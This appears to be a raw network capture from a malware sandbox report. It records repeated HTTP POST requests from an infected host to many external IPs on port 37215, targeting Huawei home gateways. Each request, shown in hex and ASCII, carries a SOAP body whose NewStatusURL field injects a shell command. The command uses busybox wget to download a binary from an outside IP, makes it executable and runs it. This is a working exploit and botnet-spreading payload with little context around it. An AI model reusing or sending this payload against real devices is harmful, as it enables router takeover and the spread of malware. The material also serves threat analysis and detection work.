2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1999192.168.2.153978241.7.129.10337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604093075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2000192.168.2.156003041.84.85.15137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604182959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2001192.168.2.153383041.178.178.17237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604286909 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2002192.168.2.154977841.204.140.25337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604445934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2003192.168.2.155349841.159.234.13437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604475021 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2004192.168.2.153355441.207.181.3937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604546070 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2005192.168.2.155705041.46.246.16837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604568958 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2006192.168.2.153388641.101.46.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604621887 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2007192.168.2.155780641.169.165.22337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604661942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2008192.168.2.154596441.170.13.3437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604690075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2009192.168.2.155385241.184.198.6837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.604691982 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
